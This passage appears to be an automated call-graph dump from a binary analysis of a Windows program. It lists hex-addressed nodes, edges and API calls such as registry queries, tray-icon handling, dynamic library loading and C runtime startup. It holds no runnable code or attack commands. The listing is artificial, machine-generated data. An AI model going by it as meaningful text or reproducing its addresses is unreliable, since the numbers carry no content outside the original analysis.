28edae timeGetTime 94584 281caa 49 API calls 94438->94584 94440 2f5733 Sleep 94440->94465 94442 29dc38 timeGetTime 94442->94465 94444 282aae 307 API calls 94444->94470 94446 2f5926 GetExitCodeProcess 94448 2f593c WaitForSingleObject 94446->94448 94449 2f5952 CloseHandle 94446->94449 94447 2f5445 Sleep 94447->94470 94448->94449 94448->94470 94449->94465 94450 2f5432 Sleep 94450->94447 94451 2e8c4b 108 API calls 94451->94465 94452 282c79 107 API calls 94452->94465 94454 2f59ae Sleep 94454->94470 94455 281caa 49 API calls 94455->94470 94458 28ce19 48 API calls 94458->94465 94460 28d6e9 55 API calls 94460->94465 94461 28fe30 307 API calls 94461->94470 94463 2945e0 307 API calls 94463->94470 94464 293200 307 API calls 94464->94470 94465->94436 94465->94442 94465->94446 94465->94447 94465->94450 94465->94451 94465->94452 94465->94454 94465->94458 94465->94460 94465->94470 94586 2c4cbe 49 API calls Mailbox 94465->94586 94587 281caa 49 API calls 94465->94587 94588 282aae 331 API calls 94465->94588 94589 2dccb2 50 API calls 94465->94589 94590 2c7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94465->94590 94591 2c6532 63 API calls 3 library calls 94465->94591 94467 2ccc5c 86 API calls 94467->94470 94468 28ce19 48 API calls 94468->94470 94469 28d6e9 55 API calls 94469->94470 94470->94414 94470->94418 94470->94420 94470->94428 94470->94429 94470->94430 94470->94432 94470->94433 94470->94434 94470->94435 94470->94438 94470->94440 94470->94444 94470->94447 94470->94455 94470->94461 94470->94463 94470->94464 94470->94465 94470->94467 94470->94468 94470->94469 94500 28ef00 94470->94500 94505 28f110 94470->94505 94570 29e244 94470->94570 94575 29dc5f 94470->94575 94580 28eed0 331 API calls Mailbox 94470->94580 94585 2e8d23 48 API calls 94470->94585 94471->93463 94472->93521 94473->93500 94474->93500 94475->93500 94476->93524 94477->93463 94478->93521 94479->93507 94480->93507 94481->93511 94482->93521 94483->93487 94484->93521 94485->93521 94486->93521 94487->93500 94488->93500 94489->93500 94490->93500 94492 28d6f4 94491->94492 94494 28d71b 94492->94494 94614 28d764 55 API calls 94492->94614 94494->93486 94495->93521 94496->93495 94497->93461 94498->93521 94499->94408 94501 28ef1d 94500->94501 94502 28ef2f 94500->94502 94501->94470 94592 2ccc5c 86 API calls 4 library calls 94502->94592 94504 2f86f9 94504->94504 94506 28f130 94505->94506 94509 28fe30 331 API calls 94506->94509 94511 28f199 94506->94511 94507 28f3dd 94510 2f87c8 94507->94510 94521 28f3f2 94507->94521 94554 28f431 Mailbox 94507->94554 94508 28f595 94516 28d7f7 48 API calls 94508->94516 94508->94554 94512 2f8728 94509->94512 94597 2ccc5c 86 API calls 4 library calls 94510->94597 94511->94507 94511->94508 94517 28d7f7 48 API calls 94511->94517 94555 28f229 94511->94555 94512->94511 94594 2ccc5c 86 API calls 4 library calls 94512->94594 94514 28fe30 331 API calls 94514->94554 94518 2f87a3 94516->94518 94519 2f8772 94517->94519 94596 2a0f0a 52 API calls __cinit 94518->94596 94595 2a0f0a 52 API calls __cinit 94519->94595 94546 28f418 94521->94546 94598 2c9af1 48 API calls 94521->94598 94522 2f8b1b 94536 2f8bcf 94522->94536 94537 2f8b2c 94522->94537 94523 28f770 94529 2f8a45 94523->94529 94547 28f77a 94523->94547 94525 28d6e9 55 API calls 94525->94554 94527 2f8c53 94612 2ccc5c 86 API calls 4 library calls 94527->94612 94528 2f8810 94599 2deef8 331 API calls 94528->94599 94604 29c1af 48 API calls 94529->94604 94530 28fe30 331 API calls 94548 28f6aa 94530->94548 94531 2f8b7e 94607 2de40a 331 API calls Mailbox 94531->94607 94609 2ccc5c 86 API calls 4 library calls 94536->94609 94606 2df5ee 331 API calls 94537->94606 94538 2f8beb 94610 2dbdbd 331 API calls Mailbox 94538->94610 94542 291b90 48 API calls 94542->94554 94543 291b90 48 API calls 94543->94554 94545 2f8c00 94569 28f537 Mailbox 94545->94569 94611 2ccc5c 86 API calls 4 library calls 94545->94611 94546->94522 94546->94548 94546->94554 94547->94543 94548->94523 94548->94530 94551 28fce0 94548->94551 94548->94554 94548->94569 94550 2f8823 94550->94546 94553 2f884b 94550->94553 94551->94569 94608 2ccc5c 86 API calls 4 library calls 94551->94608 94552 2ccc5c 86 API calls 94552->94554 94600 2dccdc 48 API calls 94553->94600 94554->94514 94554->94525 94554->94527 94554->94531 94554->94538 94554->94542 94554->94551 94554->94552 94554->94569 94593 28dd47 48 API calls ___crtGetEnvironmentStringsW 94554->94593 94605 2b97ed InterlockedDecrement 94554->94605 94613 29c1af 48 API calls 94554->94613 94555->94507 94555->94508 94555->94546 94555->94554 94559 2f8857 94561 2f8865 94559->94561 94562 2f88aa 94559->94562 94601 2c9b72 48 API calls 94561->94601 94565 2f88a0 Mailbox 94562->94565 94602 2ca69d 48 API calls 94562->94602 94563 28fe30 331 API calls 94563->94569 94565->94563 94567 2f88e7 94603 28bc74 48 API calls 94567->94603 94569->94470 94571 29e253 94570->94571 94572 2fdf42 94570->94572 94571->94470 94573 2fdf77 94572->94573 94574 2fdf59 TranslateAcceleratorW 94572->94574 94574->94571 94576 29dca3 94575->94576 94577 29dc71 94575->94577 94576->94470 94577->94576 94578 29dc96 IsDialogMessageW 94577->94578 94579 2fdd1d GetClassLongW 94577->94579 94578->94576 94578->94577 94579->94577 94579->94578 94580->94470 94581->94414 94582->94417 94583->94422 94584->94470 94585->94470 94586->94465 94587->94465 94588->94465 94589->94465 94590->94465 94591->94465 94592->94504 94593->94554 94594->94511 94595->94555 94596->94554 94597->94569 94598->94528 94599->94550 94600->94559 94601->94565 94602->94567 94603->94565 94604->94554 94605->94554 94606->94554 94607->94551 94608->94569 94609->94569 94610->94545 94611->94569 94612->94569 94613->94554 94614->94494 94615->93135 94616 2f19cb 94621 282322 94616->94621 94618 2f19d1 94654 2a0f0a 52 API calls __cinit 94618->94654 94620 2f19db 94622 282344 94621->94622 94655 2826df 94622->94655 94627 28d7f7 48 API calls 94628 282384 94627->94628 94629 28d7f7 48 API calls 94628->94629 94630 28238e 94629->94630 94631 28d7f7 48 API calls 94630->94631 94632 282398 94631->94632 94633 28d7f7 48 API calls 94632->94633 94634 2823de 94633->94634 94635 28d7f7 48 API calls 94634->94635 94636 2824c1 94635->94636 94663 28263f 94636->94663 94640 2824f1 94641 28d7f7 48 API calls 94640->94641 94642 2824fb 94641->94642 94692 282745 94642->94692 94644 282546 94645 282556 GetStdHandle 94644->94645 94646 2f501d 94645->94646 94647 2825b1 94645->94647 94646->94647 94649 2f5026 94646->94649 94648 2825b7 CoInitialize 94647->94648 94648->94618 94699 2c92d4 53 API calls 94649->94699 94651 2f502d 94700 2c99f9 CreateThread 94651->94700 94653 2f5039 CloseHandle 94653->94648 94654->94620 94701 282854 94655->94701 94659 28234a 94660 28272e 94659->94660 94727 2827ec 6 API calls 94660->94727 94662 28237a 94662->94627 94664 28d7f7 48 API calls 94663->94664 94665 28264f 94664->94665 94666 28d7f7 48 API calls 94665->94666 94667 282657 94666->94667 94728 2826a7 94667->94728 94670 2826a7 48 API calls 94671 282667 94670->94671 94672 28d7f7 48 API calls 94671->94672 94673 282672 94672->94673 94674 29f4ea 48 API calls 94673->94674 94675 2824cb 94674->94675 94676 2822a4 94675->94676 94677 2822b2 94676->94677 94678 28d7f7 48 API calls 94677->94678 94679 2822bd 94678->94679 94680 28d7f7 48 API calls 94679->94680 94681 2822c8 94680->94681 94682 28d7f7 48 API calls 94681->94682 94683 2822d3 94682->94683 94684 28d7f7 48 API calls 94683->94684 94685 2822de 94684->94685 94686 2826a7 48 API calls 94685->94686 94687 2822e9 94686->94687 94688 29f4ea 48 API calls 94687->94688 94689 2822f0 94688->94689 94690 2822f9 RegisterWindowMessageW 94689->94690 94691 2f1fe7 94689->94691 94690->94640 94693 2f5f4d 94692->94693 94694 282755 94692->94694 94733 2cc942 50 API calls 94693->94733 94696 29f4ea 48 API calls 94694->94696 94697 28275d 94696->94697 94697->94644 94698 2f5f58 94699->94651 94700->94653 94734 2c99df 54 API calls 94700->94734 94719 282870 94701->94719 94704 282870 48 API calls 94705 282864 94704->94705 94706 28d7f7 48 API calls 94705->94706 94707 282716 94706->94707 94708 286a63 94707->94708 94709 286adf 94708->94709 94712 286a6f __NMSG_WRITE 94708->94712 94710 28b18b 48 API calls 94709->94710 94711 286ab6 ___crtGetEnvironmentStringsW 94710->94711 94711->94659 94713 286a8b 94712->94713 94714 286ad7 94712->94714 94716 286b4a 48 API calls 94713->94716 94726 28c369 48 API calls 94714->94726 94717 286a95 94716->94717 94718 29ee75 48 API calls 94717->94718 94718->94711 94720 28d7f7 48 API calls 94719->94720 94721 28287b 94720->94721 94722 28d7f7 48 API calls 94721->94722 94723 282883 94722->94723 94724 28d7f7 48 API calls 94723->94724 94725 28285c 94724->94725 94725->94704 94726->94711 94727->94662 94729 28d7f7 48 API calls 94728->94729 94730 2826b0 94729->94730 94731 28d7f7 48 API calls 94730->94731 94732 28265f 94731->94732 94732->94670 94733->94698 94735 2cbb64 94736 2cbb71 94735->94736 94739 2cbb77 94735->94739 94737 2a1c9d _free 47 API calls 94736->94737 94737->94739 94738 2cbb88 94741 2cbb9a 94738->94741 94742 2a1c9d _free 47 API calls 94738->94742 94739->94738 94740 2a1c9d _free 47 API calls 94739->94740 94740->94738 94742->94741 94743 2f9c06 94754 29d3be 94743->94754 94745 2f9c1c 94746 2f9c91 Mailbox 94745->94746 94763 281caa 49 API calls 94745->94763 94749 293200 331 API calls 94746->94749 94748 2f9c71 94751 2f9cc5 94748->94751 94764 2cb171 48 API calls 94748->94764 94749->94751 94753 2fa7ab Mailbox 94751->94753 94765 2ccc5c 86 API calls 4 library calls 94751->94765 94755 29d3ca 94754->94755 94756 29d3dc 94754->94756 94766 28dcae 50 API calls Mailbox 94755->94766 94758 29d40b 94756->94758 94759 29d3e2 94756->94759 94767 28dcae 50 API calls Mailbox 94758->94767 94761 29f4ea 48 API calls 94759->94761 94760 29d3d4 94760->94745 94761->94760 94763->94748 94764->94746 94765->94753 94766->94760 94767->94760 94768 283742 94769 28374b 94768->94769 94770 2837c6 94769->94770 94771 2837c8 94769->94771 94772 283769 94769->94772 94773 2837ab DefWindowProcW 94770->94773 94774 2837ce 94771->94774 94775 2f1e00 94771->94775 94776 28382c PostQuitMessage 94772->94776 94777 283776 94772->94777 94783 2837b9 94773->94783 94778 2837d3 94774->94778 94779 2837f6 SetTimer RegisterWindowMessageW 94774->94779 94823 282ff6 16 API calls 94775->94823 94776->94783 94781 2f1e88 94777->94781 94782 283781 94777->94782 94784 2837da KillTimer 94778->94784 94785 2f1da3 94778->94785 94779->94783 94787 28381f CreatePopupMenu 94779->94787 94838 2c4ddd 60 API calls _memset 94781->94838 94788 283789 94782->94788 94789 283836 94782->94789 94820 283847 Shell_NotifyIconW _memset 94784->94820 94791 2f1ddc MoveWindow 94785->94791 94792 2f1da8 94785->94792 94786 2f1e27 94824 29e312 331 API calls Mailbox 94786->94824 94787->94783 94795 2f1e6d 94788->94795 94796 283794 94788->94796 94813 29eb83 94789->94813 94791->94783 94799 2f1dac 94792->94799 94800 2f1dcb SetFocus 94792->94800 94795->94773 94837 2ba5f3 48 API calls 94795->94837 94802 28379f 94796->94802 94803 2f1e58 94796->94803 94797 2f1e9a 94797->94773 94797->94783 94799->94802 94804 2f1db5 94799->94804 94800->94783 94801 2837ed 94821 28390f DeleteObject DestroyWindow Mailbox 94801->94821 94802->94773 94825 283847 Shell_NotifyIconW _memset 94802->94825 94836 2c55bd 70 API calls _memset 94803->94836 94822 282ff6 16 API calls 94804->94822 94809 2f1e68 94809->94783 94811 2f1e4c 94826 284ffc 94811->94826 94814 29eb9a _memset 94813->94814 94815 29ec1c 94813->94815 94839 2851af 94814->94839 94815->94783 94817 29ec05 KillTimer SetTimer 94817->94815 94818 29ebc1 94818->94817 94819 2f3c7a Shell_NotifyIconW 94818->94819 94819->94817 94820->94801 94821->94783 94822->94783 94823->94786 94824->94802 94825->94811 94827 285027 _memset 94826->94827 94861 284c30 94827->94861 94830 2850ac 94832 2850ca Shell_NotifyIconW 94830->94832 94833 2f3d28 Shell_NotifyIconW 94830->94833 94834 2851af 50 API calls 94832->94834 94835 2850df 94834->94835 94835->94770 94836->94809 94837->94770 94838->94797 94840 2851cb 94839->94840 94859 2852a2 Mailbox 94839->94859 94841 286b0f 48 API calls 94840->94841 94842 2851d9 94841->94842 94843 2f3ca1 LoadStringW 94842->94843 94844 2851e6 94842->94844 94847 2f3cbb 94843->94847 94845 286a63 48 API calls 94844->94845 94846 2851fb 94845->94846 94846->94847 94848 28520c 94846->94848 94849 28510d 48 API calls 94847->94849 94850 285216 94848->94850 94851 2852a7 94848->94851 94854 2f3cc5 94849->94854 94853 28510d 48 API calls 94850->94853 94852 286eed 48 API calls 94851->94852 94860 285220 _memset _wcscpy 94852->94860 94853->94860 94855 28518c 48 API calls 94854->94855 94854->94860 94856 2f3ce7 94855->94856 94858 28518c 48 API calls 94856->94858 94857 285288 Shell_NotifyIconW 94857->94859 94858->94860 94859->94818 94860->94857 94862 2f3c33 94861->94862 94863 284c44 94861->94863 94862->94863 94864 2f3c3c DestroyIcon 94862->94864 94863->94830 94865 2c5819 61 API calls _W_store_winword 94863->94865 94864->94863 94865->94830 94866 2f19dd 94871 284a30 94866->94871 94868 2f19f1 94891 2a0f0a 52 API calls __cinit 94868->94891 94870 2f19fb 94872 284a40 __ftell_nolock 94871->94872 94873 28d7f7 48 API calls 94872->94873 94874 284af6 94873->94874 94892 285374 94874->94892 94876 284aff 94899 28363c 94876->94899 94879 28518c 48 API calls 94880 284b18 94879->94880 94905 2864cf 94880->94905 94883 28d7f7 48 API calls 94884 284b32 94883->94884 94911 2849fb 94884->94911 94886 284b43 Mailbox 94886->94868 94887 284b3d _wcscat Mailbox __NMSG_WRITE 94887->94886 94888 28ce19 48 API calls 94887->94888 94889 2864cf 48 API calls 94887->94889 94890 2861a6 48 API calls 94887->94890 94888->94887 94889->94887 94890->94887 94891->94870 94925 2af8a0 94892->94925 94895 28ce19 48 API calls 94896 2853a7 94895->94896 94927 28660f 94896->94927 94898 2853b1 Mailbox 94898->94876 94900 283649 __ftell_nolock 94899->94900 94938 28366c GetFullPathNameW 94900->94938 94902 28365a 94903 286a63 48 API calls 94902->94903 94904 283669 94903->94904 94904->94879 94907 28651b 94905->94907 94910 2864dd ___crtGetEnvironmentStringsW 94905->94910 94906 29f4ea 48 API calls 94908 284b29 94906->94908 94909 29f4ea 48 API calls 94907->94909 94908->94883 94909->94910 94910->94906 94940 28bcce 94911->94940 94914 2f41cc RegQueryValueExW 94916 2f4246 RegCloseKey 94914->94916 94917 2f41e5 94914->94917 94915 284a2b 94915->94887 94918 29f4ea 48 API calls 94917->94918 94919 2f41fe 94918->94919 94920 2847b7 48 API calls 94919->94920 94921 2f4208 RegQueryValueExW 94920->94921 94922 2f423b 94921->94922 94923 2f4224 94921->94923 94922->94916 94924 286a63 48 API calls 94923->94924 94924->94922 94926 285381 GetModuleFileNameW 94925->94926 94926->94895 94928 2af8a0 __ftell_nolock 94927->94928 94929 28661c GetFullPathNameW 94928->94929 94930 286a63 48 API calls 94929->94930 94931 286643 94930->94931 94934 286571 94931->94934 94935 28657f 94934->94935 94936 28b18b 48 API calls 94935->94936 94937 28658f 94936->94937 94937->94898 94939 28368a 94938->94939 94939->94902 94941 28bce8 94940->94941 94942 284a0a RegOpenKeyExW 94940->94942 94943 29f4ea 48 API calls 94941->94943 94942->94914 94942->94915 94944 28bcf2 94943->94944 94945 29ee75 48 API calls 94944->94945 94945->94942 94946 2f197b 94951 29dd94 94946->94951 94950 2f198a 94952 29f4ea 48 API calls 94951->94952 94953 29dd9c 94952->94953 94954 29ddb0 94953->94954 94959 29df3d 94953->94959 94958 2a0f0a 52 API calls __cinit 94954->94958 94958->94950 94960 29dda8 94959->94960 94961 29df46 94959->94961 94963 29ddc0 94960->94963 94991 2a0f0a 52 API calls __cinit 94961->94991 94964 28d7f7 48 API calls 94963->94964 94965 29ddd7 GetVersionExW 94964->94965 94966 286a63 48 API calls 94965->94966 94967 29de1a 94966->94967 94992 29dfb4 94967->94992 94970 286571 48 API calls 94977 29de2e 94970->94977 94972 2f24c8 94974 29dea4 GetCurrentProcess 95005 29df5f LoadLibraryA GetProcAddress 94974->95005 94975 29df31 GetSystemInfo 94979 29df0e 94975->94979 94976 29dee3 94999 29e00c 94976->94999 94977->94972 94996 29df77 94977->94996 94982 29df1c FreeLibrary 94979->94982 94983 29df21 94979->94983 94982->94983 94983->94954 94984 29debb 94984->94975 94984->94976 94985 29df29 GetSystemInfo 94987 29df03 94985->94987 94986 29def9 95002 29dff4 94986->95002 94987->94979 94990 29df09 FreeLibrary 94987->94990 94990->94979 94991->94960 94993 29dfbd 94992->94993 94994 28b18b 48 API calls 94993->94994 94995 29de22 94994->94995 94995->94970 95006 29df89 94996->95006 95010 29e01e 94999->95010 95003 29e00c 2 API calls 95002->95003 95004 29df01 GetNativeSystemInfo 95003->95004 95004->94987 95005->94984 95007 29dea0 95006->95007 95008 29df92 LoadLibraryA 95006->95008 95007->94974 95007->94984 95008->95007 95009 29dfa3 GetProcAddress 95008->95009 95009->95007 95011 29def1 95010->95011 95012 29e027 LoadLibraryA 95010->95012 95011->94985 95011->94986 95012->95011 95013 29e038 GetProcAddress 95012->95013 95013->95011 95014 2f19ba 95019 29c75a 95014->95019 95018 2f19c9 95020 28d7f7 48 API calls 95019->95020 95021 29c7c8 95020->95021 95027 29d26c 95021->95027 95023 29c865 95025 29c881 95023->95025 95030 29d1fa 48 API calls ___crtGetEnvironmentStringsW 95023->95030 95026 2a0f0a 52 API calls __cinit 95025->95026 95026->95018 95031 29d298 95027->95031 95030->95023 95032 29d28b 95031->95032 95033 29d2a5 95031->95033 95032->95023 95033->95032 95034 29d2ac RegOpenKeyExW 95033->95034 95034->95032 95035 29d2c6 RegQueryValueExW 95034->95035 95036 29d2fc RegCloseKey 95035->95036 95037 29d2e7 95035->95037 95036->95032 95037->95036 95038 2f8eb8 95042 2ca635 95038->95042 95040 2f8ec3 95041 2ca635 84 API calls 95040->95041 95041->95040 95048 2ca66f 95042->95048 95050 2ca642 95042->95050 95043 2ca671 95054 29ec4e 81 API calls 95043->95054 95044 2ca676 95046 28936c 81 API calls 95044->95046 95047 2ca67d 95046->95047 95049 28510d 48 API calls 95047->95049 95048->95040 95049->95048 95050->95043 95050->95044 95050->95048 95051 2ca669 95050->95051 95053 294525 61 API calls ___crtGetEnvironmentStringsW 95051->95053 95053->95048 95054->95044 95055 2a5dfd 95056 2a5e09 __getstream 95055->95056 95092 2a7eeb GetStartupInfoW 95056->95092 95058 2a5e0e 95094 2a9ca7 GetProcessHeap 95058->95094 95060 2a5e66 95061 2a5e71 95060->95061 95179 2a5f4d 47 API calls 3 library calls 95060->95179 95095 2a7b47 95061->95095 95064 2a5e77 95065 2a5e82 __RTC_Initialize 95064->95065 95180 2a5f4d 47 API calls 3 library calls 95064->95180 95116 2aacb3 95065->95116 95068 2a5e91 95069 2a5e9d GetCommandLineW 95068->95069 95181 2a5f4d 47 API calls 3 library calls 95068->95181 95135 2b2e7d GetEnvironmentStringsW 95069->95135 95072 2a5e9c 95072->95069 95076 2a5ec2 95148 2b2cb4 95076->95148 95079 2a5ec8 95080 2a5ed3 95079->95080 95183 2a115b 47 API calls 3 library calls 95079->95183 95162 2a1195 95080->95162 95083 2a5edb 95084 2a5ee6 __wwincmdln 95083->95084 95184 2a115b 47 API calls 3 library calls 95083->95184 95166 283a0f 95084->95166 95087 2a5efa 95088 2a5f09 95087->95088 95185 2a13f1 47 API calls _doexit 95087->95185 95186 2a1186 47 API calls _doexit 95088->95186 95091 2a5f0e __getstream 95093 2a7f01 95092->95093 95093->95058 95094->95060 95187 2a123a 30 API calls 2 library calls 95095->95187 95097 2a7b4c 95188 2a7e23 InitializeCriticalSectionAndSpinCount 95097->95188 95099 2a7b51 95100 2a7b55 95099->95100 95190 2a7e6d TlsAlloc 95099->95190 95189 2a7bbd 50 API calls 2 library calls 95100->95189 95103 2a7b5a 95103->95064 95104 2a7b67 95104->95100 95105 2a7b72 95104->95105 95191 2a6986 95105->95191 95108 2a7bb4 95199 2a7bbd 50 API calls 2 library calls 95108->95199 95111 2a7b93 95111->95108 95113 2a7b99 95111->95113 95112 2a7bb9 95112->95064 95198 2a7a94 47 API calls 4 library calls 95113->95198 95115 2a7ba1 GetCurrentThreadId 95115->95064 95117 2aacbf __getstream 95116->95117 95118 2a7cf4 __lock 47 API calls 95117->95118 95119 2aacc6 95118->95119 95120 2a6986 __calloc_crt 47 API calls 95119->95120 95121 2aacd7 95120->95121 95122 2aad42 GetStartupInfoW 95121->95122 95124 2aace2 @_EH4_CallFilterFunc@8 __getstream 95121->95124 95130 2aae80 95122->95130 95132 2aad57 95122->95132 95123 2aaf44 95208 2aaf58 LeaveCriticalSection _doexit 95123->95208 95124->95068 95126 2aaec9 GetStdHandle 95126->95130 95127 2a6986 __calloc_crt 47 API calls 95127->95132 95128 2aaedb GetFileType 95128->95130 95129 2aada5 95129->95130 95133 2aadd7 GetFileType 95129->95133 95134 2aade5 InitializeCriticalSectionAndSpinCount 95129->95134 95130->95123 95130->95126 95130->95128 95131 2aaf08 InitializeCriticalSectionAndSpinCount 95130->95131 95131->95130 95132->95127 95132->95129 95132->95130 95133->95129 95133->95134 95134->95129 95136 2b2e8e 95135->95136 95137 2a5ead 95135->95137 95209 2a69d0 47 API calls _W_store_winword 95136->95209 95142 2b2a7b GetModuleFileNameW 95137->95142 95140 2b2eca FreeEnvironmentStringsW 95140->95137 95141 2b2eb4 ___crtGetEnvironmentStringsW 95141->95140 95143 2b2aaf _wparse_cmdline 95142->95143 95144 2a5eb7 95143->95144 95145 2b2ae9 95143->95145 95144->95076 95182 2a115b 47 API calls 3 library calls 95144->95182 95210 2a69d0 47 API calls _W_store_winword 95145->95210 95147 2b2aef _wparse_cmdline 95147->95144 95149 2b2ccd __NMSG_WRITE 95148->95149 95153 2b2cc5 95148->95153 95150 2a6986 __calloc_crt 47 API calls 95149->95150 95158 2b2cf6 __NMSG_WRITE 95150->95158 95151 2b2d4d 95152 2a1c9d _free 47 API calls 95151->95152 95152->95153 95153->95079 95154 2a6986 __calloc_crt 47 API calls 95154->95158 95155 2b2d72 95157 2a1c9d _free 47 API calls 95155->95157 95157->95153 95158->95151 95158->95153 95158->95154 95158->95155 95159 2b2d89 95158->95159 95211 2b2567 47 API calls 2 library calls 95158->95211 95212 2a6e20 IsProcessorFeaturePresent 95159->95212 95161 2b2d95 95161->95079 95163 2a11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95162->95163 95165 2a11e0 __IsNonwritableInCurrentImage 95163->95165 95227 2a0f0a 52 API calls __cinit 95163->95227 95165->95083 95167 2f1ebf 95166->95167 95168 283a29 95166->95168 95169 283a63 IsThemeActive 95168->95169 95228 2a1405 95169->95228 95173 283a8f 95240 283adb SystemParametersInfoW SystemParametersInfoW 95173->95240 95175 283a9b 95241 283d19 95175->95241 95177 283aa3 SystemParametersInfoW 95178 283ac8 95177->95178 95178->95087 95179->95061 95180->95065 95181->95072 95185->95088 95186->95091 95187->95097 95188->95099 95189->95103 95190->95104 95194 2a698d 95191->95194 95193 2a69ca 95193->95108 95197 2a7ec9 TlsSetValue 95193->95197 95194->95193 95195 2a69ab Sleep 95194->95195 95200 2b30aa 95194->95200 95196 2a69c2 95195->95196 95196->95193 95196->95194 95197->95111 95198->95115 95199->95112 95201 2b30b5 95200->95201 95205 2b30d0 __calloc_impl 95200->95205 95202 2b30c1 95201->95202 95201->95205 95207 2a7c0e 47 API calls __getptd_noexit 95202->95207 95203 2b30e0 HeapAlloc 95203->95205 95206 2b30c6 95203->95206 95205->95203 95205->95206 95206->95194 95207->95206 95208->95124 95209->95141 95210->95147 95211->95158 95213 2a6e2b 95212->95213 95218 2a6cb5 95213->95218 95217 2a6e46 95217->95161 95219 2a6ccf _memset __call_reportfault 95218->95219 95220 2a6cef IsDebuggerPresent 95219->95220 95226 2a81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95220->95226 95222 2a6db3 __call_reportfault 95223 2aa70c __cftoe2_l 6 API calls 95222->95223 95224 2a6dd6 95223->95224 95225 2a8197 GetCurrentProcess TerminateProcess 95224->95225 95225->95217 95226->95222 95227->95165 95229 2a7cf4 __lock 47 API calls 95228->95229 95230 2a1410 95229->95230 95293 2a7e58 LeaveCriticalSection 95230->95293 95232 283a88 95233 2a146d 95232->95233 95234 2a1491 95233->95234 95235 2a1477 95233->95235 95234->95173 95235->95234 95294 2a7c0e 47 API calls __getptd_noexit 95235->95294 95237 2a1481 95295 2a6e10 8 API calls __cftoe2_l 95237->95295 95239 2a148c 95239->95173 95240->95175 95242 283d26 __ftell_nolock 95241->95242 95243 28d7f7 48 API calls 95242->95243 95244 283d31 GetCurrentDirectoryW 95243->95244 95296 2861ca 95244->95296 95246 283d57 IsDebuggerPresent 95247 283d65 95246->95247 95248 2f1cc1 MessageBoxA 95246->95248 95250 2f1cd9 95247->95250 95251 283d82 95247->95251 95280 283e3a 95247->95280 95248->95250 95249 283e41 SetCurrentDirectoryW 95254 283e4e Mailbox 95249->95254 95411 29c682 48 API calls 95250->95411 95370 2840e5 95251->95370 95254->95177 95255 2f1ce9 95260 2f1cff SetCurrentDirectoryW 95255->95260 95260->95254 95280->95249 95293->95232 95294->95237 95295->95239 95413 29e99b 95296->95413 95300 2861eb 95301 285374 50 API calls 95300->95301 95302 2861ff 95301->95302 95303 28ce19 48 API calls 95302->95303 95304 28620c 95303->95304 95430 2839db 95304->95430 95306 286216 Mailbox 95307 286eed 48 API calls 95306->95307 95308 28622b 95307->95308 95442 289048 95308->95442 95311 28ce19 48 API calls 95312 286244 95311->95312 95313 28d6e9 55 API calls 95312->95313 95314 286254 Mailbox 95313->95314 95315 28ce19 48 API calls 95314->95315 95316 28627c 95315->95316 95317 28d6e9 55 API calls 95316->95317 95318 28628f Mailbox 95317->95318 95319 28ce19 48 API calls 95318->95319 95320 2862a0 95319->95320 95321 28d645 53 API calls 95320->95321 95322 2862b2 Mailbox 95321->95322 95323 28d7f7 48 API calls 95322->95323 95324 2862c5 95323->95324 95445 2863fc 95324->95445 95328 2862df 95329 2862e9 95328->95329 95330 2f1c08 95328->95330 95331 2a0fa7 _W_store_winword 59 API calls 95329->95331 95332 2863fc 48 API calls 95330->95332 95334 2862f4 95331->95334 95333 2f1c1c 95332->95333 95336 2863fc 48 API calls 95333->95336 95334->95333 95335 2862fe 95334->95335 95337 2a0fa7 _W_store_winword 59 API calls 95335->95337 95338 2f1c38 95336->95338 95339 286309 95337->95339 95341 285374 50 API calls 95338->95341 95339->95338 95340 286313 95339->95340 95342 2a0fa7 _W_store_winword 59 API calls 95340->95342 95343 2f1c5d 95341->95343 95344 28631e 95342->95344 95345 2863fc 48 API calls 95343->95345 95346 28635f 95344->95346 95347 2f1c86 95344->95347 95350 2863fc 48 API calls 95344->95350 95349 2f1c69 95345->95349 95346->95347 95348 28636c 95346->95348 95351 286eed 48 API calls 95347->95351 95355 29c050 48 API calls 95348->95355 95352 286eed 48 API calls 95349->95352 95353 286342 95350->95353 95354 2f1ca8 95351->95354 95356 2f1c77 95352->95356 95357 286eed 48 API calls 95353->95357 95358 2863fc 48 API calls 95354->95358 95359 286384 95355->95359 95360 2863fc 48 API calls 95356->95360 95361 286350 95357->95361 95362 2f1cb5 95358->95362 95363 291b90 48 API calls 95359->95363 95360->95347 95364 2863fc 48 API calls 95361->95364 95362->95362 95367 286394 95363->95367 95364->95346 95365 291b90 48 API calls 95365->95367 95367->95365 95368 2863fc 48 API calls 95367->95368 95369 2863d6 Mailbox 95367->95369 95461 286b68 48 API calls 95367->95461 95368->95367 95369->95246 95371 2840f2 __ftell_nolock 95370->95371 95372 2f370e _memset 95371->95372 95373 28410b 95371->95373 95376 2f372a GetOpenFileNameW 95372->95376 95374 28660f 49 API calls 95373->95374 95375 284114 95374->95375 95506 2840a7 95375->95506 95378 2f3779 95376->95378 95379 286a63 48 API calls 95378->95379 95381 2f378e 95379->95381 95381->95381 95411->95255 95414 28d7f7 48 API calls 95413->95414 95415 2861db 95414->95415 95416 286009 95415->95416 95417 286016 __ftell_nolock 95416->95417 95418 286a63 48 API calls 95417->95418 95423 28617c Mailbox 95417->95423 95420 286048 95418->95420 95428 28607e Mailbox 95420->95428 95462 2861a6 95420->95462 95421 28614f 95422 28ce19 48 API calls 95421->95422 95421->95423 95425 286170 95422->95425 95423->95300 95424 28ce19 48 API calls 95424->95428 95426 2864cf 48 API calls 95425->95426 95426->95423 95427 2864cf 48 API calls 95427->95428 95428->95421 95428->95423 95428->95424 95428->95427 95429 2861a6 48 API calls 95428->95429 95429->95428 95431 2841a9 136 API calls 95430->95431 95432 2839fe 95431->95432 95433 283a06 95432->95433 95465 2cc396 95432->95465 95433->95306 95436 2f2ff0 95437 2a1c9d _free 47 API calls 95436->95437 95439 2f2ffd 95437->95439 95438 284252 84 API calls 95438->95436 95440 284252 84 API calls 95439->95440 95441 2f3006 95440->95441 95441->95441 95443 29f4ea 48 API calls 95442->95443 95444 286237 95443->95444 95444->95311 95446 28641f 95445->95446 95447 286406 95445->95447 95449 286a63 48 API calls 95446->95449 95448 286eed 48 API calls 95447->95448 95450 2862d1 95448->95450 95449->95450 95451 2a0fa7 95450->95451 95452 2a1028 95451->95452 95453 2a0fb3 95451->95453 95505 2a103a 59 API calls 4 library calls 95452->95505 95460 2a0fd8 95453->95460 95503 2a7c0e 47 API calls __getptd_noexit 95453->95503 95455 2a1035 95455->95328 95457 2a0fbf 95504 2a6e10 8 API calls __cftoe2_l 